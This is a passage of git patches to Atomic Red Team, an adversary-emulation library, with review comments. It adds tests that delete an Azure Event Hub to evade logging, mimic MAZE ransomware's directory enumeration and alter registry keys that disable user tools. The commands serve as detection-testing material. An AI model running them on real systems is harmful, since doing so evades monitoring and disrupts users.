+ +## Atomic Test #4 - Process Discovery - get-wmiObject +Utilize get-wmiObject PowerShell cmdlet to identify processes. + +Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** b51239b4-0129-474f-a2b4-70f855b9f2c2 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +get-wmiObject -class Win32_Process +``` + + + + + + +
+
+ +## Atomic Test #5 - Process Discovery - wmic process +Utilize windows management instrumentation to identify processes. + +Upon successful execution, WMIC will execute process to list processes. Output will be via stdout. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 640cbf6d-659b-498b-ba53-f6dd1a1cc02c + + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +wmic process get /format:list +``` + + + + + +
From b7425664a2cacdd65da5d220519c3b43aa21f3c5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 21:06:50 +0000 Subject: [PATCH 48/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 4b8e9e76..de1e03e6 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -911,3 +911,4 @@ d4a6da40-618f-454d-9a9e-26af552aaeb0 3b3809b6-a54b-4f5b-8aff-cb51f2e97b34 b51239b4-0129-474f-a2b4-70f855b9f2c2 640cbf6d-659b-498b-ba53-f6dd1a1cc02c +5e09bed0-7d33-453b-9bf3-caea32bff719 From 12749d4ba69808befe56818d08a54dc0a81f15e8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 21:06:56 +0000 Subject: [PATCH 49/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-iaas-azure.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/linux-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/linux-index.md | 1 + atomics/Indexes/index.yaml | 51 ++++++++++++++++ atomics/T1562.008/T1562.008.md | 58 +++++++++++++++++++ 7 files changed, 114 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json index f6d18d8a..84a4357c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]}]} \ No newline at end of file +{"version":"4.3","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c617160d..9469cf77 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -353,6 +353,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh +defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.002,Disable Windows Event Logging,1,Disable Windows IIS HTTP Logging,69435dcf-c66f-4ec0-a8b1-82beb76b34db,powershell defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service Threads,41ac52ba-5d5e-40c0-b267-573ed90489bd,powershell defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 525ea1fa..649d2159 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -97,6 +97,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh +defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index b2590017..26247eb7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -578,6 +578,7 @@ - Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows] - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md) - Atomic Test #1: AWS CloudTrail Changes [iaas:aws] + - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md) - Atomic Test #1: Disable Windows IIS HTTP Logging [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index a467540a..133abe9d 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -216,6 +216,7 @@ - T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.008 Disable Cloud Logs](../../T1562.008/T1562.008.md) - Atomic Test #1: AWS CloudTrail Changes [iaas:aws] + - Atomic Test #2: Azure - Eventhub Deletion [iaas:azure] - T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8ec9b797..02f976bc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -25131,6 +25131,57 @@ defense-evasion: cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n" name: sh elevation_required: false + - name: Azure - Eventhub Deletion + auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719 + description: | + Identifies an Event Hub deletion in Azure. + An Event Hub is an event processing service that ingests and processes large volumes of events and data. + An adversary may delete an Event Hub in an attempt to evade detection. + https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about. + supported_platforms: + - iaas:azure + input_arguments: + username: + description: Azure username + type: String + default: + password: + description: Azure password + type: String + default: + event_hub_name: + description: Name of the eventhub + type: String + default: test_eventhub + resource_group: + description: Name of the resource group + type: String + default: + name_space_name: + description: Name of the NameSpace + type: String + default: + dependency_executor_name: powershell + dependencies: + - description: 'Install-Module -Name Az + +' + prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) + {exit 0} else {exit 1}} catch {exit 1} + +' + get_prereq_command: 'Install-Module -Name AzureAD -Force + +' + executor: + command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-AzureAD -Credential $creds + New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} + Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} + name: powershell + elevation_required: false T1600.002: technique: id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5 
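Review bot: The executor signs in with `Connect-AzureAD -Credential $creds` but then calls `New-AzEventHub`/`Remove-AzEventHub`, which are Az (Az.EventHub) cmdlets that run under the Az.Accounts context rather than an AzureAD session, so the create/delete will most likely fail unless an Az login already exists on the runner; the dependency block has the same mismatch, describing `Install-Module -Name Az` while its check and install target `AzureAD`. The login line should be `Connect-AzAccount -Credential $creds`, and the prereq should test for `Az.EventHub` (or `Az`) instead of `AzureAD`. Because `#{password}` is substituted into the script text, it will land in PowerShell script-block logging and any transcript on the runner, which is worth a sentence in the description recommending a dedicated least-privilege test identity. The description's "Identifies an Event Hub deletion" reads like a detection rule; "Creates and then deletes an Event Hub" is what the command does. This block is generated from atomics/T1562.008/T1562.008.yaml, which is outside this view and is where the fix belongs.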
diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md index 1ab059ae..57fbeb8c 100644 --- a/atomics/T1562.008/T1562.008.md +++ b/atomics/T1562.008/T1562.008.md @@ -8,6 +8,8 @@ Cloud environments allow for collection and analysis of audit and application lo - [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes) +- [Atomic Test #2 - Azure - Eventhub Deletion](#atomic-test-2---azure---eventhub-deletion) +
@@ -64,4 +66,60 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws +
+
+ +## Atomic Test #2 - Azure - Eventhub Deletion +Identifies an Event Hub deletion in Azure. +An Event Hub is an event processing service that ingests and processes large volumes of events and data. +An adversary may delete an Event Hub in an attempt to evade detection. +https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about. + +**Supported Platforms:** Iaas:azure + + +**auto_generated_guid:** 5e09bed0-7d33-453b-9bf3-caea32bff719 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| username | Azure username | String | | +| password | Azure password | String | | +| event_hub_name | Name of the eventhub | String | test_eventhub| +| resource_group | Name of the resource group | String | | +| name_space_name | Name of the NameSpace | String | | + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force +$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd +Connect-AzureAD -Credential $creds +New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} +Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Install-Module -Name Az +##### Check Prereq Commands: +```powershell +try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} +``` +##### Get Prereq Commands: +```powershell +Install-Module -Name AzureAD -Force +``` + + + +
From ba8f007cea0891216e96c48ad72977f7b8993a86 Mon Sep 17 00:00:00 2001 From: Leo Verlod <96517806+Leomon5@users.noreply.github.com> Date: Tue, 15 Mar 2022 19:32:03 -0500 Subject: [PATCH 50/83] Adding T1083 Test 5 - Simulating MAZE Directory Enumeration (#1812) Adding T1083 Test 5 - Simulating MAZE Directory Enumeration. This test is designed to simulate the directory enumeration function used by MAZE ransomware (Windows). --- atomics/T1083/T1083.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index ad00894a..988e5da3 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml 
@@ -82,3 +82,31 @@ atomic_tests:
 find . -type f -name ".*"
 cleanup_command: 'rm #{output_file}'
 name: sh
+- name: Simulating MAZE Directory Enumeration
+ description: |
+ This test emulates MAZE ransomware's ability to enumerate directories using Powershell.
+ Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window.
+ See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+ supported_platforms:
+ - windows
+ input_arguments:
+ File_to_output:
+ description: File to output results to
+ type: String
+ default: $env:temp\T1083Test5.txt
+ executor:
+ command: |
+ $folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming")
+ Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}
+ Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output}
+ Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output}
+ $UsersFolder = "$env:homedrive\Users\"
+ foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue)
+ {
+ foreach ($secondarydirectory in $folderarray)
+ {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}}
+ }
+ cat #{File_to_output}
+ cleanup_command: |
+ remove-item #{File_to_output} -ErrorAction SilentlyContinue
+ name: powershell
From 6ac1e3a1a4a4ebe586d5c15c55aa1a795822aac7 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 16 Mar 2022 00:32:40 +0000 Subject: [PATCH 51/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1083/T1083.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+)
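Review bot: `Get-ChildItem -Path $env:homedrive` passes a bare `C:` with no trailing separator, which PowerShell treats as a drive-relative path (the current directory on that drive), so the first enumeration most likely lists the runner's working directory rather than the drive root the MAZE emulation intends; `-Path "$env:homedrive\"` enumerates the root. The output path is substituted unquoted into every `Out-File -append #{File_to_output}`, into `cat`, and into the cleanup `remove-item`, so an `$env:temp` containing a space (a user profile with a space in its name) splits the argument and the test silently writes nowhere; quote it as `"#{File_to_output}"` in all five places. The input name `File_to_output` departs from the `output_file` name the sibling tests in this file use (visible in the `rm #{output_file}` cleanup context above), and aligning it keeps the arguments discoverable. Mixing `\` and `/` in `"$UsersFolder/$directory/$secondarydirectory"` works on Windows, but `Join-Path $UsersFolder $directory $secondarydirectory` would avoid the doubled separator.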
diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index 988e5da3..beef4ed5 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -83,6 +83,7 @@ atomic_tests: cleanup_command: 'rm #{output_file}' name: sh - name: Simulating MAZE Directory Enumeration + auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8 description: | This test emulates MAZE ransomware's ability to enumerate directories using Powershell. Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index de1e03e6..88d6f1b4 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -912,3 +912,4 @@ d4a6da40-618f-454d-9a9e-26af552aaeb0 b51239b4-0129-474f-a2b4-70f855b9f2c2 640cbf6d-659b-498b-ba53-f6dd1a1cc02c 5e09bed0-7d33-453b-9bf3-caea32bff719 +c6c34f61-1c3e-40fb-8a58-d017d88286d8 From 341b5b198766888e108e68c0940066281fe16728 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Mar 2022 00:32:47 +0000 Subject: [PATCH 52/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 28 ++++++++++ atomics/T1083/T1083.md | 51 +++++++++++++++++++ 6 files changed, 83 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 9469cf77..440e572d 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -821,6 +821,7 @@ discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh +discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 0f3cc867..7415432b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -561,6 +561,7 @@ discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell +discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 26247eb7..85d3ea02 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1326,6 +1326,7 @@ - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] - Atomic Test #3: Nix File and Directory Discovery [macos, linux] - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux] + - Atomic Test #5: Simulating MAZE Directory Enumeration [windows] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #1: Enumerate all accounts (Local) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index e82acf47..e93541ee 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -947,6 +947,7 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] + - Atomic Test #5: Simulating MAZE Directory Enumeration [windows] - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Local Account](../../T1087.001/T1087.001.md) - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 02f976bc..f3b8af6a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -56087,6 +56087,34 @@ discovery: find . -type f -name ".*" cleanup_command: 'rm #{output_file}' name: sh + - name: Simulating MAZE Directory Enumeration + auto_generated_guid: c6c34f61-1c3e-40fb-8a58-d017d88286d8 + description: "This test emulates MAZE ransomware's ability to enumerate directories + using Powershell. \nUpon successful execution, this test will output the directory + enumeration results to a specified file, as well as display them in the active + window. \nSee https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n" + supported_platforms: + - windows + input_arguments: + File_to_output: + description: File to output results to + type: String + default: "$env:temp\\T1083Test5.txt" + executor: + command: "$folderarray = @(\"Desktop\", \"Downloads\", \"Documents\", \"AppData/Local\", + \"AppData/Roaming\")\nGet-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue + | Out-File -append #{File_to_output}\nGet-ChildItem -Path $env:programfiles + -erroraction silentlycontinue | Out-File -append #{File_to_output}\nGet-ChildItem + -Path \"${env:ProgramFiles(x86)}\" -erroraction silentlycontinue | Out-File + -append #{File_to_output}\n$UsersFolder = \"$env:homedrive\\Users\\\"\nforeach + ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) + \n{\nforeach ($secondarydirectory in $folderarray)\n {Get-ChildItem -Path + \"$UsersFolder/$directory/$secondarydirectory\" -ErrorAction SilentlyContinue + | Out-File -append #{File_to_output}}\n}\ncat #{File_to_output}\n" + cleanup_command: 'remove-item #{File_to_output} -ErrorAction SilentlyContinue + +' + name: powershell T1016.001: technique: external_references: diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index 90ef8a50..b040b8d9 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md 
@@ -14,6 +14,8 @@ Many command shell utilities can be used to obtain this information. Examples in - [Atomic Test #4 - Nix File and Directory Discovery 2](#atomic-test-4---nix-file-and-directory-discovery-2) +- [Atomic Test #5 - Simulating MAZE Directory Enumeration](#atomic-test-5---simulating-maze-directory-enumeration) +
@@ -170,4 +172,53 @@ rm #{output_file} +
+
+ +## Atomic Test #5 - Simulating MAZE Directory Enumeration +This test emulates MAZE ransomware's ability to enumerate directories using Powershell. +Upon successful execution, this test will output the directory enumeration results to a specified file, as well as display them in the active window. +See https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents + +**Supported Platforms:** Windows + + +**auto_generated_guid:** c6c34f61-1c3e-40fb-8a58-d017d88286d8 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| File_to_output | File to output results to | String | $env:temp\T1083Test5.txt| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$folderarray = @("Desktop", "Downloads", "Documents", "AppData/Local", "AppData/Roaming") +Get-ChildItem -Path $env:homedrive -ErrorAction SilentlyContinue | Out-File -append #{File_to_output} +Get-ChildItem -Path $env:programfiles -erroraction silentlycontinue | Out-File -append #{File_to_output} +Get-ChildItem -Path "${env:ProgramFiles(x86)}" -erroraction silentlycontinue | Out-File -append #{File_to_output} +$UsersFolder = "$env:homedrive\Users\" +foreach ($directory in Get-ChildItem -Path $UsersFolder -ErrorAction SilentlyContinue) +{ +foreach ($secondarydirectory in $folderarray) + {Get-ChildItem -Path "$UsersFolder/$directory/$secondarydirectory" -ErrorAction SilentlyContinue | Out-File -append #{File_to_output}} +} +cat #{File_to_output} +``` + +#### Cleanup Commands: +```powershell +remove-item #{File_to_output} -ErrorAction SilentlyContinue +``` + + + + +
From 1cb8a5395b6653da31dcea559601ca3076532c7c Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Wed, 16 Mar 2022 01:44:39 +0100 Subject: [PATCH 53/83] Disable Windows Notification And Some Group Policy Features. (#1813) * Update T1112.yaml * Update T1112.yaml * typos Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 228 +++++++++++++++++++++++++++++++++++++-- 1 file changed, 219 insertions(+), 9 deletions(-) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 997b2a40..1e74ca0f 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -160,7 +160,7 @@ atomic_tests: auto_generated_guid: ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows registry tool to prevent user modifying registry entry. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: @@ -174,7 +174,7 @@ atomic_tests: auto_generated_guid: d2561a6d-72bd-408c-b150-13efe1801c2a description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows CMD application. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: 
@@ -188,7 +188,7 @@ atomic_tests: auto_generated_guid: af254e70-dd0e-4de6-9afe-a994d9ea8b62 description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows task manager application. - See example how Agent Tesla malware abuse this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry + See example how Agent Tesla malware abuses this technique: https://any.run/report/ea4ea08407d4ee72e009103a3b77e5a09412b722fdef67315ea63f22011152af/a866d7b1-c236-4f26-a391-5ae32213dfc4#registry supported_platforms: - windows executor: @@ -202,7 +202,7 @@ atomic_tests: auto_generated_guid: c0d6d67f-1f63-42cc-95c0-5fd6b20082ad description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows notification center. - See how remcos rat abuse this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html + See how remcos rat abuses this technique- https://tccontre.blogspot.com/2020/01/remcos-rat-evading-windows-defender-av.html supported_platforms: - windows executor: @@ -216,7 +216,7 @@ atomic_tests: auto_generated_guid: 6e0d1131-2d7e-4905-8ca5-d6172f05d03d description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. - See how ransomware abuse this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ + See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ supported_platforms: - windows executor: 
